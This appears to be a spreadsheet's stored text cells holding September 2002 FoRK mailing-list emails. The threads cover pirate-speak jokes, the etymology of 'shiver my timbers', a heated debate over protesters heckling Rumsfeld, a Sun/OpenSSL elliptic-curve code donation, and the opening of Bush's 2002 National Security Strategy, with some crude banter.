  maintaining teamwork momentum within and between Web meetings."  "WebEx is transforming the way businesses use the Web for sales, marketing,
  training, support and product design," says David Farrington, vice president
  of corporate development at WebEx Communications. "By integrating the
  communications capabilities of the WebEx platform with Endeavors' secure
  collaboration network, Endeavors has created an offering that provides the
  best in synchronous and asynchronous communications."  About Magi
  Magi Enterprise 3.0, an award-winning web collaboration system, transforms
  today's Web into a highly secure inter- and intra-enterprise collaboration
  network of files and web resources.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an intuitive graphical
  interface, and universal name spaces generating "follow me URLs" for mobile
  professionals.  About Endeavors Technology, Inc.
  Endeavors Technology, Inc. is a wholly-owned subsidiary of mobile computing
  and network infrastructure vendor Tadpole Technology plc (LSE-TAD,
  www.tadpole.com), which has plants and offices in Irvine and Carlsbad
  (California), and Cambridge, Edinburgh, and Bristol (UK). For further
  information on Endeavors' P2P solutions, call 949-833-2800, email to
  p2p@endeavors.com, or visit the company's website http://www.endeavors.com.  ends  For further information, please contact:  Bernard Hulme, Tadpole Technology - via Patcom Media
  Hugh Paterson, Patcom Media - Tel 0207 987 4888, Email
  hughp@patcom-media.com  Bullets for Editors  WebEx
  Web communications services (synchronous): network-based platform for
  delivering highly interactive, visually dynamic Web communications. The
  WebEx platform supports real-time data, voice and video communications.
  WebEx is the only company to design, develop and deploy a global network for
  real-time Web communications.  Magi
  On and off-line (asynchronous) communication and collaboration: cross
  enterprise search and discovery, transparent security and trust (SSL &amp; PKI),
  2-way web access to files and applications, permanent cross firewall access,
  ad hoc and permanent secure groups, centralized or decentralized control of
  access lists and security privileges, centralized caching of information
  (never lose anything critical), multi-device access to information (desktop,
  laptop, PDA).
</t>
  </si>
  <si>
    <t xml:space="preserve">
On Thursday, Sep 19, 2002, at 14:51 Europe/London, Bill Kearney wrote:&gt;&gt; From the completely unrelated but funny department...
&gt;
&gt; "Talk like a Pirate Day".
&gt; http://www.washingtonpost.com/wp-dyn/articles/A5011-2002Sep11.html
&gt;
&gt; Which is today, of course.
&gt;
&gt; That and 'piratecore' rapping style...
&gt; http://poorman.blogspot.com/2002_09_01_poorman_archive.html#81798893
&gt;
&gt; Anything, just anything, to get us off the geek dating tips topic....
&gt;
&gt; -Bill Kearney
&gt;
Arrr, he be a scurvy dog, that Bill Kearney.
</t>
  </si>
  <si>
    <t>Ben Hammersley wrote:&gt;
&gt; On Thursday, Sep 19, 2002, at 14:51 Europe/London, Bill Kearney wrote:
&gt;
&gt;&gt;&gt; From the completely unrelated but funny department...
&gt;&gt;
&gt;&gt;
&gt;&gt; "Talk like a Pirate Day".
&gt;&gt; http://www.washingtonpost.com/wp-dyn/articles/A5011-2002Sep11.html
&gt;&gt;
&gt;&gt; Which is today, of course.
&gt;&gt;
&gt;&gt; That and 'piratecore' rapping style...
&gt;&gt; http://poorman.blogspot.com/2002_09_01_poorman_archive.html#81798893
&gt;&gt;
&gt;&gt; Anything, just anything, to get us off the geek dating tips topic....
&gt;&gt;
&gt;&gt; -Bill Kearney
&gt;&gt;
&gt;
&gt;
&gt; Arrr, he be a scurvy dog, that Bill Kearney.Well, shiver me timbers, but my favorite pirate phrase is missing from 
both of those.Arrr....
and wondering if there's a rap equivalent.
Owenhttp://www.quinion.com/words/qa/qa-shi2.htm
*Q AND A SECTION**SHIVER MY TIMBERS*/From Tad Spencer/: "Please could you tell me where the phrase /shiver 
my timbers/ originated?"This is one of those supposedly nautical expressions that seem to be 
better known through a couple of appearances in fiction than by any 
actual sailors' usage.It's an exclamation that may allude to a ship striking some rock or 
other obstacle so hard that her timbers shiver, or shake, so implying a 
calamity has occurred. It is first recorded as being used by Captain 
Frederick Marryat in /Jacob Faithful/ in 1835: "I won't thrash you Tom. 
Shiver my timbers if I do".It has gained a firm place in the language because almost fifty years 
later Robert Louis Stevenson found it to be just the kind of old-salt 
saying that fitted the character of Long John Silver in /Treasure 
Island/: "Cross me, and you'll go where many a good man's gone before 
you ... some to the yard-arm, shiver my timbers, and some by the board, 
and all to feed the fishes". Since then, it's mainly been the preserve 
of second-rate seafaring yarns.</t>
  </si>
  <si>
    <t xml:space="preserve">Geege Schuman wrote:
&gt; less obscure haiku 
&gt; 
&gt; buy a puppy, ro!
&gt; they are chick magnets. master
&gt; ventriloquism.Reminds me of a Gary Larson cartoon,
woman walking dog, man walking aligator,
dog mostly eaten by aligator, thought cloud
above man's head,
"This is *such* a great way to meet chicks!"- Joe
</t>
  </si>
  <si>
    <t xml:space="preserve">
Ahhhh Dave Winer..Seems like only yesterday fork was knee deep in
winerrants..hes gone away though...so sad (insert real honest to goshness
tears)But the past  live on...in the archives...Remeber when Dave was being betrayed by O'Reilly?
http://www.xent.com/aug00/0725.html
On "closed source" justifications
http://www.xent.com/FoRK-archive/sept00/0346.html
Daves trys to grok fork
http://www.xent.com/FoRK-archive/sept00/0953.html
NT runs just as good as linux...really
http://www.xent.com/aug00/0069.htmlThere are a few months of this stuff (just google or forkcrawl the
archives) then he got truly fedup with all our  not polite unfresh
thinking and went silent, for the most part.oh well, back to life.-tom</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt;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worst.Bill
</t>
  </si>
  <si>
    <t>Bill Stoddard wrote:&gt;&gt;Chuck Murcko wrote:
&gt;&gt;
&gt;&gt;    
&gt;&gt;
&gt;&gt;&gt;Heh, ten years ago saying the exact same words was most definitely not
&gt;&gt;&gt;"parroting the party line".
&gt;&gt;&gt;
&gt;&gt;&gt;It was even less so thirty years ago. My story remains the same, take
&gt;&gt;&gt;it or leave it. I've said the same words to white supremacists as to
&gt;&gt;&gt;suburban leftist punks as to homeys as to French Irish, etc. etc.:
&gt;&gt;&gt;
&gt;&gt;&gt;I don't have to agree with anything you say. I *am* obligated to
&gt;&gt;&gt;defend to the death your right to say it. I don't give a rat's ass
&gt;&gt;&gt;where you say it, even in France. I don't care where the political
&gt;&gt;&gt;pendulum has swung currently.
&gt;&gt;&gt;
&gt;&gt;&gt;Chuck
&gt;&gt;&gt;      
&gt;&gt;&gt;
&gt;&gt;I had to laugh at Rumsfield yesterday - when he was heckled by
&gt;&gt;protestors, he said something like "They couldn't do that in Iraq."
&gt;&gt;Meanwhile, from what I could tell, the protestors were being arrested.
&gt;&gt;
&gt;&gt;Owen
&gt;&gt;    
&gt;&gt;
&gt;
&gt;Trying to shoutdown a speaker or being loud and rowdy while someone else is
&gt;trying to speak (in the vernacular, 'getting in their face') is rude and
&gt;disrespectful.  And persistently getting in someones face is assault, a
&gt;criminal offense. If these people have something to say, they can say it
&gt;with signs or get their own venue.  And here is something else to chew on...
&gt;these protesters are NOT interested in changing anyones mind about what
&gt;Rumsfield is saying. How likely are you to change someone's mind by being
&gt;rude and disrespectful to them? Is this how to win friends and influence
&gt;people? Either these folks are social misfits who have no understanding of
&gt;human interactions (else they would try more constructive means to get their
&gt;message across) or they are just out to get their rocks off regardless of
&gt;how it affects other people, and that is immoral at best and downright evil
&gt;at worst.
&gt;
&gt;Bill
&gt;  
&gt;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anybody's face
(at least in my understanding of the vernacular).And no, being rude and disrespectful is not the way to influence 
politicians, but the standard way of using lobbyists and
writing checks is beyond many of us.Owen</t>
  </si>
  <si>
    <t>On Thu, 19 Sep 2002, Bill Stoddard wrote:
--]How likely are you to change someone's mind by being
--]rude and disrespectful to them? Is this how to win friends and influence
--]people?Point the first, I doubt if they are trying to change Rumsy's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digging.Now point the third, is it annoying? Yes, and if your annoyed then the "in
yer facers" have done thier job. Sad to say the polite persnikiters are
teh very fule the "in yer facers" hope to ignite. If your burning, your
being used.Pointed the personal...The politics of the polite are more often the
refuge of backstabings,  closed mouth recourlessness and hypocritcal
behavoirs. Id rather hear what those who oppose me have to say than
quietly be knifed by the slow hand of the coward.Seek not the polite or impolite but rather the reasons why.
-tom</t>
  </si>
  <si>
    <t xml:space="preserve">Owen Byrne writes:
&gt; [quoting http://www.quinion.com/words/qa/qa-shi2.htm]
&gt; *SHIVER MY TIMBERS*
&gt; 
&gt; /From Tad Spencer/: "Please could you tell me where the phrase /shiver 
&gt; my timbers/ originated?"
&gt; 
&gt; This is one of those supposedly nautical expressions that seem to be 
&gt; better known through a couple of appearances in fiction than by any 
&gt; actual sailors' usage.
&gt; 
&gt; It's an exclamation that may allude to a ship striking some rock or 
&gt; other obstacle so hard that her timbers shiver, or shake, so implying a 
&gt; calamity has occurred. It is first recorded as being used by Captain 
&gt; Frederick Marryat in /Jacob Faithful/ in 1835: "I won't thrash you Tom. 
&gt; Shiver my timbers if I do".It seems implausible to me that "shiver" here means "to shake"; I don't
recall seeing the word used transitively in that sense, and web1913
lists that sense as "v. i.", or intransitive.  The transitive sense of
"shiver", which we no longer use but which people used widely in the
1800s (web1913 doesn't even list it as archaic or obsolete), means
"to shatter into splinters, normally with a blow".Shivering a boat's timbers, of course, leaves you with no boat.
(Shivering some of them, which will happen if you hit a rock hard enough,
leaves you with a sinking boat.)So, "Shiver my timbers if I do," can be reasonably interpreted as a more
vivid way of saying, "May I die suddenly if I do."  The interpretation
suggested by Quinion, "May my boat be damaged," neither makes as much
sense in context nor obeys the normal rules of grammar.I've sent a copy of this to Quinion.
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; On Thu, 19 Sep 2002, Bill Stoddard wrote:
&gt; --]How likely are you to change someone's mind by being
&gt; --]rude and disrespectful to them? Is this how to win friends and
&gt; influence
&gt; --]people?
&gt;
&gt; Point the first, I doubt if they are trying to change Rumsy's mind but
&gt; rather to show others that there is a vocal and violent opposition to his
&gt; views. With such flagrant showings of opposition there would be more
&gt; coverage of the opposing ideas and thus the spreading of the dissenting
&gt; meme. A viri need not comply with the wishes of the attacked host, rather
&gt; the host had better make some antibodies or learn to adapt.
&gt;
&gt; Point the second. Historicaly the "in yer face" mode of confrontation has
&gt; been used to gain popular support and to grow from seeds "grass roots"
&gt; movements. Witness the big bold "in yer face" signature of Hancock on the
&gt; "in yer  face" Declaration of the american colonies to the governing
&gt; powers of england. Witness also the chicago seven, Others will follow in
&gt; examplare  form upon digging.
&gt;
&gt; Now point the third, is it annoying? Yes, and if your annoyed then the "in
&gt; yer facers" have done thier job. Sad to say the polite persnikiters are
&gt; teh very fule the "in yer facers" hope to ignite. If your burning, your
&gt; being used.
&gt;
&gt; Pointed the personal...The politics of the polite are more often the
&gt; refuge of backstabings,  closed mouth recourlessness and hypocritcal
&gt; behavoirs. Id rather hear what those who oppose me have to say than
&gt; quietly be knifed by the slow hand of the coward.
&gt;
&gt;
&gt;
&gt; Seek not the polite or impolite but rather the reasons why.
&gt;
&gt;
&gt; -tomGood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DoI.Bill
</t>
  </si>
  <si>
    <t xml:space="preserve">What I meant was that neither he nor anyone else has any *authority* to 
say something can or can't be published, and make that stick, at least 
in the US, and from some descriptions, France. Of course he can say 
anything he wants. And I can choose to ignore it, or not. Works both 
ways.Fscking semantics.ChuckOn Thursday, September 19, 2002, at 06:41 AM, Russell Turpin wrote:&gt; Robert Harley:
&gt;&gt;&gt; BTW, I wasn't aware that the 1st Amendment mandated that crap must be 
&gt;&gt;&gt; FoRKed.
&gt;
&gt; Chuck Murcko :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
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 19 Sep 2002, Bill Stoddard wrote:--]Good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History is written by the victors. If the rabble can put forth there ideas
they will be tempered in the pages of yore as "strong willed voices
decrying the obvious injustices of the day"Once again, look at the Chicago 7, a loud and rude a crowd of selfish
pricks as you were want to find in the day. History of course colors them
with times great blur filter. The jagged bits that , at the time, were
called rude and obnoxious are now seen as a stab of justive doing in the
sideof the ill pathed goverment.
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; For my part, I'd rather people didn't use FoRK as a place in which to dump an 
&gt; expression of their political beliefs.I'll second that, although with emphasis
upon /dump/, rather than on /political/.I don't mind if people advocate nuking
gay baby whales for jesus, if they can
make a good, original, argument for it.I do mind if someone should attempt to
further the notion that 1+1=2, merely
by cut-and-pasting a few pages of W&amp;R."New bits" are not a temporal property;
we create them when we add context or
clarification to the old bits of others'
thoughts.-Dave::::::::::::&gt;     ... being rude and disrespectful is not the way to influence 
&gt; politicians, but the standard way of using lobbyists and
&gt; writing checks is beyond many of us.The standard way has some extreme precedents:&gt; Q: When was the Roman empire sold, and who bought it?
&gt;
&gt; A: On March 28th, 193 AD, the Roman empire was auctioned off by the
&gt; Praetorian guards to the wealthy senator Didius Julianus for the price
&gt; of 6250 drachms per soldier.
(as found in ,
quoting Gibbon)Now, an economist might argue that selling
offices is the most efficient way to fill
them (what would Coase say?), but wouldn't
that convince everyone (but the supporters
of plutocracy) that efficiency is not the
primary virtue of politics?
</t>
  </si>
  <si>
    <t xml:space="preserve">
----- Original Message -----
From: "Kragen Sitaker" &gt; &gt; It's an exclamation that may allude to a ship striking some rock or
&gt; &gt; other obstacle so hard that her timbers shiver, or shake, so implying a
&gt; &gt; calamity has occurred. It is first recorded as being used by Captain
&gt; &gt; Frederick Marryat in /Jacob Faithful/ in 1835: "I won't thrash you Tom.
&gt; &gt; Shiver my timbers if I do".
I think it went like this: "I won't thrash you Tom, if you shiver my
timber..."
Or maybe that was just the butt pirates...
</t>
  </si>
  <si>
    <t xml:space="preserve">
Just tried smartgroups: The layout of pages is pretty challenging to
use quickly, but the most interesting aspect is that once you are in,
there is no way to get out.  You can unsubscribe yourself as the sole
member of a group, but you cannot delete the group.Or if you can, I couldn't find it before deleting myself, and now it's
invisible to me.  Another interesting thing: Security forms are reset
to full-public settings each time you load them, rather than set from
your current settings.All in all, I wasn't impressed and have stayed with the Yahooligans
for another run.-- 
Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
 - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
  "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t>On Thu, 19 Sep 2002, Mr. FoRK wrote:
--]I think it went like this: "I won't thrash you Tom, if you shiver my
--]timber..."
--]Or maybe that was just the butt pirates...
--]How did I get wrangled into this thread?
Do I really need to make pewp deck jokes at this point.Arrrrg ye mateys, now best ya be off tis topic or Ill hoist my jib and
hope for a stiff wind. Arrrg when Im happy and arrrg when Im not.</t>
  </si>
  <si>
    <t xml:space="preserve">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names.For the record, I don't think they even got arrested, which is a shame. It
is part of the game -- make an ass of yourself, get your point on the nightly
news, spend a couple days in the clink for disorderly.-- 
njl
</t>
  </si>
  <si>
    <t xml:space="preserve">---------- Forwarded message ----------
Date: 19 Sep 2002 22:18:46 -0400
From: Perry E. Metzger 
To: cryptography@wasabisystems.com
Subject: Sun donates elliptic curve code to OpenSSL?
According to this:http://www.sun.com/smi/Press/sunflash/2002-09/sunflash.20020919.8.htmlSun is donating some elliptic curve code to the OpenSSL project. Does
anyone know details that they would care to share on the nature of the
donation?-- 
Perry E. Metzger		perry@piermont.com---------------------------------------------------------------------
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to majordomo@wasabisystems.com
</t>
  </si>
  <si>
    <t xml:space="preserve">
In a message dated 9/19/2002 3:45:45 PM, dl@silcom.com writes:&gt;I don't mind if people advocate nuking
&gt;gay baby whales for jesus, if they can
&gt;make a good, original, argument for it.
I can't imagine any other kind of argument for nuking gay baby whales for 
jesus. But do you mean nuking baby gay whales who are for jesus; or nuking 
baby gay whales for Jesus's sake?splitting hairs with a FoRK,Tom
</t>
  </si>
  <si>
    <t xml:space="preserve">Well, it looks like Sun are going ahead with
their ubiquitous computing plans without Mithril. GregReuters Market News
  Sun Micro Outlines Roadmap for Managing Networks 
  Friday September 20, 5:00 am ET 
  By Peter Henderson   SAN FRANCISCO (Reuters) -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easy-to-use systems, a goal similar to those of most rivals
  making computers which manage networks. 
  EMC Corp. announced this week software aimed at allowing users to manage storage
  resources as a pool. Hewlett-Packard Co has a Utility Data Center, designed for
  broader management. International Business Machines Corp's project eLiza is working
  to make computers "self-healing" when systems break.  "Applications still have to run zeroes and ones on some computing engine but the
  whole idea behind N1 is you stop thinking about that. You don't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"It'll tell you what you have and how it is laid out," promised MacKay
  The second stage, beginning in 2003, would allow users to identify a service, such as
  online banking, and allocate resources for them with a few clicks, Sun said. 
  Finally, in 2004, Sun's software should allow networks to change uses of resources on
  the fly in response to changing needs, such as a bank assuring quicker online response
  time for priority users, the company said.
</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt; On Thu, Sep 19, 2002 at 11:11:47AM -0400, Bill Stoddard wrote:
&gt; &gt; people? Either these folks are social misfits who have no
&gt; understanding of
&gt; &gt; human interactions (else they would try more constructive means
&gt; to get their
&gt; &gt; message across) or they are just out to get their rocks off
&gt; regardless of
&gt; &gt; how it affects other people, and that is immoral at best and
&gt; downright evil
&gt; &gt; at worst.
&gt;
&gt; Are you kidding? It was fucking BRILLIANT. Do you know what
&gt; exposure that got
&gt; them? They sat perfectly so that the cameras could focus on the mildly
&gt; exasperated Rumsfeld and their "UN Inspections not war" banner.What I am specifically referring to is protesters shouting down speakers or
making so much noise that it interferes with the speaker. That's wrong,
immoral and unethical no matter what the political bent of the speakers and
the protesters. Rowdy protests in their own venue (on a college campus or
some of the commons areas of DC) is perfectly fine by me. Waving signs to
get attention is fine.&gt; That picture
&gt; will be dominating the news cycles in China, Iraq, Russia, Germany, and
&gt; France, at least. For goodness sakes, you're arguing about it on FoRK. In
&gt; politics by sound-bite, those two rude hags kicked ass and took names.
&gt;
&gt; For the record, I don't think they even got arrested, which is a shame.Well,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believe.&gt; It is part of the game -- make an ass of yourself, get your point on
&gt; the nightly
&gt; news, spend a couple days in the clink for disorderly.Sure, just don't whine about getting arrested if you make it a point to get
in someone's face.One other comment... Most of the people that are protesting against taking
out the Iraqi dictator wouldn't give a rats ass if a nuke went off in NYC.
They simply wouldn't care so why in the hell should the Americal public
listen to them on matters of national security?So enlighten me, exactly why shouldn't Hussein be taken out? And if your
answr boils down to "i don't give a shit about what happens to the US", you
can kiss my ass :-)Bill
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm sure Patton used it.I'm all for using it in the coming war with Iraq.Yet I'd be queasy about doing it in the Philippines circa 1905, which
was his point.&gt; -----Original Message-----
&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of R.
A.
&gt; Hettinga
&gt; Sent: Monday, September 16, 2002 9:44 PM
&gt; To: Digital Bearer Settlement List; fork@spamassassin.taint.org
&gt; Subject:  The War Prayer
&gt; 
&gt; 
&gt; --- begin forwarded text
&gt; 
&gt; 
&gt; Status: RO
&gt; Date: Mon, 16 Sep 2002 14:57:27 -0700
&gt; To: nettime-l@bbs.thing.net
&gt; From: Phil Duncan 
&gt; Subject:  The War Prayer
&gt; Sender: nettime-l-request@bbs.thing.net
&gt; Reply-To: Phil Duncan 
&gt; 
&gt; The following prayer is from a story by Mark Twain, and was quoted by
&gt; Lewis
&gt; Laphan in the October issue of Harper's magazine. It occurs at the
very
&gt; end
&gt; of an excellent article which I recommend to you.
&gt; 
&gt; In the story, an old man enters a church where the congregation has
been
&gt; listening to an heroic sermon about "the glory to be won in battle by
&gt; young
&gt; patriots armed with the love of God." He usurps the pulpit and prays
the
&gt; following:
&gt; 
&gt; "O Lord our God, help us to tear their soldiers to bloody shreads with
our
&gt; shells; help us to cover their smiling fields with the pale forms of
their
&gt; patriot dead; help us to drown the thunder of the guns with the
shrieks of
&gt; their wounded, writhing in pain; help us to lay waste their humble
homes
&gt; with
&gt; a hurricane of fire; help us to wring the hearts of their unoffending
&gt; widows
&gt; with unavailing grief; help us to turn them out roofless with their
little
&gt; children to wander unfriended the wastes of their desolated land in
rags
&gt; and
&gt; hunger and thirst, sports of the sun flames in summer and the icy
winds of
&gt; winter, broken in spirit, worn with travail, imploring Thee for the
refuge
&gt; of
&gt; the grave and denied it -- for our sakes who adore Thee, Lord, blast
their
&gt; hopes, blight their lives, protract their bitter pilgrimage, make
heavy
&gt; their
&gt; steps, water their way with their tears, stain the white snow with the
&gt; blood
&gt; of their wounded feet! We ask it, in the spirit of love, of Him Who is
the
&gt; Source of Love, and Who is the ever-faithful refuge and friend of all
that
&gt; are sore beset and seek His aid with humble and contrite hearts.
Amen."
&gt; 
&gt; Twain wrote the story, "The War Prayer," in 1905 during the American
&gt; occupation of the Philippines, but the story wasn't printed until
1923,
&gt; thirteen years after his death, because the editors thought it
&gt; "unsuitable"
&gt; for publication at the time it was written.
&gt; 
&gt; #  distributed via : no commercial use without permission
&gt; #   is a moderated mailing list for net criticism,
&gt; #  collaborative text filtering and cultural politics of the nets
&gt; #  more info: majordomo@bbs.thing.net and "info nettime-l" in the msg
body
&gt; #  archive: http://www.nettime.org contact: nettime@bbs.thing.net
&gt; 
&gt; --- end forwarded text
&gt; 
&gt; 
&gt; --
&gt; -----------------
&gt; R. A. Hettinga 
&gt; The Internet Bearer Underwriting Corporation 
&gt; 44 Farquhar Street, Boston, MA 02131 USA
&gt; "... however it may deserve respect for its usefulness and antiquity,
&gt; [predicting the end of the world] has not been found agreeable to
&gt; experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; A world where some live in comfort and plenty, while half of the human 
&gt; race lives on less than $2 a day, is neither just nor stable.Absolutely correct. Perhaps the most fundamental thing to realize about 
life on Earth today.The following is a fascinating document of official Government policy 
that bears close reading. It is the aspirations of a wonderful nation in 
an imperfect world.&gt;  The war on terrorism is not a clash of civilizations. It does, 
&gt; however, reveal the clash inside a civilization, a battle for the 
&gt; future of the Muslim world. This is a struggle of ideas and this is an 
&gt; area where America must excel.I was recently at a lecture about the surprising success of Radio Sawa, 
our new music-and-news channel for 15-30 year old Arabs. It's #1 in 
practically every market it's entered, nearing 90% listenership in 
Amman. And it's even beginning to be trusted for news, well past BBC and 
taking share from every other government broadcaster.It is as hard to imagine America losing a war of ideas in the long-term 
as it is to imagine America making any headway at all in the short term.Many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might.As you read, replace "United States" with "Roman Empire" and it may make 
as much sense, in the long view of history. I don't know how proud to be 
about that, but it is telling. Sometime I daydream that the President 
might sit down with the nation with Perotista flip charts and explain to 
our citizens the sheer vastness of our 700+ military installations 
overseas and what they do for us. It would be a powerful education on 
how engaged we are in the world around us.Heck, I'd love to see a real-time map of Federal expenditures around the 
globe, a softly glowing necklace of embassies, carriers, arctic research 
stations, hotels, golf courses, warehouses, libraries, clinics and all 
the rest of the influence a trillion dollars here or there can buy.Of course, this still doesn't leave me any more comfortable with the 
real news in this document: the Bush Doctrine for pre-emptive strikes. 
I'd sooner repeal the Church amendments on covert action than permit 
such a principle to be loosed upon the world.Rohit-----------------------------------------------------
September 20, 2002Full Text: Bush's National Security StrategyFollowing is the full text of President Bush's new national security 
strategy. The document, entitled "The National Security Strategy of the 
United States," will soon be transmitted to Congress as a declaration of 
the Administration's policy.INTRODUCTIONTHE great struggles of the twentieth century between liberty and 
totalitarianism ended with a decisive victory for the forces of 
freedom -- and a single sustainable model for national success: freedom, 
democracy, and free enterprise. In the twenty-first century, only 
nations that share a commitment to protecting basic human rights and 
guaranteeing political and economic freedom will be able to unleash the 
potential of their people and assure their future prosperity. People 
everywhere want to say what they think; choose who will govern them; 
worship as they please; educate their children -- male and female; own 
property; and enjoy the benefits of their labor. These values of freedom 
are right and true for every person, in every society -- and the duty of 
protecting these values against their enemies is the common calling of 
freedom-loving people across the globe and across the ages.Today, the United States enjoys a position of unparalleled military 
strength and great economic and political influence. In keeping with our 
heritage and principles, we do not use our strength to press for 
unilateral advantage. We seek instead to create a balance of power that 
favors human freedom: conditions in which all nations and all societies 
can choose for themselves the rewards and challenges of political and 
economic liberty. By making the world safer, we allow the people of the 
world to make their own lives better. We will defend this just peace 
against threats from terrorists and tyrants. We will preserve the peace 
by building good relations among the great powers. We will extend the 
peace by encouraging free and open societies on every continent.Defending our Nation against its enemies is the first and fundamental 
commitment of the Federal Government. Today, that task has changed 
dramatically. Enemies in the past needed great armies and great 
industrial capabilities to endanger America. Now, shadowy networks of 
individuals can bring great chaos and suffering to our shores for less 
than it costs to purchase a single tank. Terrorists are organized to 
penetrate open societies and to turn the power of modern technologies 
against us.To defeat this threat we must make use of every tool in our arsenal -- 
from better homeland defenses and law enforcement to intelligence and 
cutting off terrorist financing. The war against terrorists of global 
reach is a global enterprise of uncertain duration. America will help 
nations that need our assistance in combating terror. And America will 
hold to account nations that are compromised by terror -- because the 
allies of terror are the enemies of civilization. The United States and 
countries cooperating with us must not allow the terrorists to develop 
new home bases. Together, we will seek to deny them sanctuary at every 
turn.The gravest danger our Nation faces lies at the crossroads of radicalism 
and technology. Our enemies have openly declared that they are seeking 
weapons of mass destruction, and evidence indicates that they are doing 
so with determination. The United States will not allow these efforts to 
succeed. We will build defenses against ballistic missiles and other 
means of delivery. We will cooperate with other nations to deny, 
contain, and curtail our enemies' efforts to acquire dangerous 
technologies. And, as a matter of common sense and self-defense, America 
will act against such emerging threats before they are fully formed. We 
cannot defend America and our friends by hoping for the best. So we must 
be prepared to defeat our enemies' plans, using the best intelligence 
and proceeding with deliberation. History will judge harshly those who 
saw this coming danger but failed to act. In the new world we have 
entered, the only path to safety is the path of action.As we defend the peace, we will also take advantage of an historic 
opportunity to preserve the peace. Today, the international community 
has the best chance since the rise of the nation-state in the 
seventeenth century to build a world where great powers compete in peace 
instead of continually prepare for war. Today, the world's great powers 
find ourselves on the same side -- united by common dangers of terrorist 
violence and chaos. The United States will build on these common 
interests to promote global security. We are also increasingly united by 
common values. Russia is in the midst of a hopeful transition, reaching 
for its democratic future and a partner in the war on terror. Chinese 
leaders are discovering that economic freedom is the only source of 
national wealth. In time, they will find that social and political 
freedom is the only source of national greatness. America will encourage 
the advancement of democracy and economic openness in both nations, 
because these are the best foundations for domestic stability and 
international order. We will strongly resist aggression from other great 
powers -- even as we welcome their peaceful pursuit of prosperity, 
trade, and cultural advancement.Finally, the United States will use this moment of opportunity to extend 
the benefits of freedom across the globe. We will actively work to bring 
the hope of democracy, development, free markets, and free trade to 
every corner of the world. The events of September 11, 2001, taught us 
that weak states, like Afghanistan, can pose as great a danger to our 
national interests as strong states. Poverty does not make poor people 
into terrorists and murderers. Yet poverty, weak institutions, and 
corruption can make weak states vulnerable to terrorist networks and 
drug cartels within their borders.The United States will stand beside any nation determined to build a 
better future by seeking the rewards of liberty for its people. Free 
trade and free markets have proven their ability to lift whole societies 
out of poverty -- so the United States will work with individual 
nations, entire regions, and the entire global trading community to 
build a world that trades in freedom and therefore grows in prosperity. 
The United States will deliver greater development assistance through 
the New Millennium Challenge Account to nations that govern justly, 
invest in their people, and encourage economic freedom. We will also 
continue to lead the world in efforts to reduce the terrible toll of 
AIDS and other infectious diseases.In building a balance of power that favors freedom, the United States is 
guided by the conviction that all nations have important 
responsibilities. Nations that enjoy freedom must actively fight terror. 
Nations that depend on international stability must help prevent the 
spread of weapons of mass destruction. Nations that seek international 
aid must govern themselves wisely, so that aid is well spent. For 
freedom to thrive, accountability must be expected and required.We are also guided by the conviction that no nation can build a safer, 
better world alone. Alliances and multilateral institutions can multiply 
the strength of freedom-loving nations. The United States is committed 
to lasting institutions like the United Nations, the World Trade 
Organization, the Organization of American States, and NATO as well as 
other long-standing alliances. Coalitions of the willing can augment 
these permanent institutions. In all cases, international obligations 
are to be taken seriously. They are not to be undertaken symbolically to 
rally support for an ideal without furthering its attainment.Freedom is the non-negotiable demand of human dignity; the birthright of 
every person -- in every civilization. Throughout history, freedom has 
been threatened by war and terror; it has been challenged by the 
clashing wills of powerful states and the evil designs of tyrants; and 
it has been tested by widespread poverty and disease. Today, humanity 
holds in its hands the opportunity to further freedom's triumph over all 
these foes. The United States welcomes our responsibility to lead in 
this great mission.I. Overview of America's International Strategy
"Our Nation's cause has always been larger than our Nation's defense. We 
fight, as we always fight, for a just peace -- a peace that favors 
liberty. We will defend the peace against the threats from terrorists 
and tyrants. We will preserve the peace by building good relations among 
the great powers. And we will extend the peace by encouraging free and 
open societies on every continent."
President Bush
West Point, New York
June 1, 2002The United States possesses unprecedented -- and unequaled -- strength 
and influence in the world. Sustained by faith in the principles of 
liberty, and the value of a free society, this position comes with 
unparalleled responsibilities, obligations, and opportunity. The great 
strength of this nation must be used to promote a balance of power that 
favors freedom.For most of the twentieth century, the world was divided by a great 
struggle over ideas: destructive totalitarian visions versus freedom and 
equality.That great struggle is over. The militant visions of class, nation, and 
race which promised utopia and delivered misery have been defeated and 
discredited. America is now threatened less by conquering states than we 
are by failing ones. We are menaced less by fleets and armies than by 
catastrophic technologies in the hands of the embittered few. We must 
defeat these threats to our Nation, allies, and friends.This is also a time of opportunity for America. We will work to 
translate this moment of influence into decades of peace, prosperity, 
and liberty. The U.S. national security strategy will be based on a 
distinctly American internationalism that reflects the union of our 
values and our national interests. The aim of this strategy is to help 
make the world not just safer but better. Our goals on the path to 
progress are clear: political and economic freedom, peaceful relations 
with other states, and respect for human dignity.And this path is not America's alone. It is open to all.To achieve these goals, the United States will:*	champion aspirations for human dignity;*	strengthen alliances to defeat global terrorism and work to prevent 
attacks against us and our friends;*	work with others to defuse regional conflicts;*	prevent our enemies from threatening us, our allies, and our 
friends, with weapons of mass destruction;*	ignite a new era of global economic growth through free markets and 
free trade;*	expand the circle of development by opening societies and building 
the infrastructure of democracy;*	develop agendas for cooperative action with other main centers of 
global power; and*	transform America's national security institutions to meet the 
challenges and opportunities of the twenty-first century.
II. Champion Aspirations for Human Dignity
"Some worry that it is somehow undiplomatic or impolite to speak the 
language of right and wrong. I disagree. Different circumstances require 
different methods, but not different moralities."President Bush
West Point, New York
June 1, 2002In pursuit of our goals, our first imperative is to clarify what we 
stand for: the United States must defend liberty and justice because 
these principles are right and true for all people everywhere. No nation 
owns these aspirations, and no nation is exempt from them. Fathers and 
mothers in all societies want their children to be educated and to live 
free from poverty and violence. No people on earth yearn to be 
oppressed, aspire to servitude, or eagerly await the midnight knock of 
the secret police.America must stand firmly for the nonnegotiable demands of human 
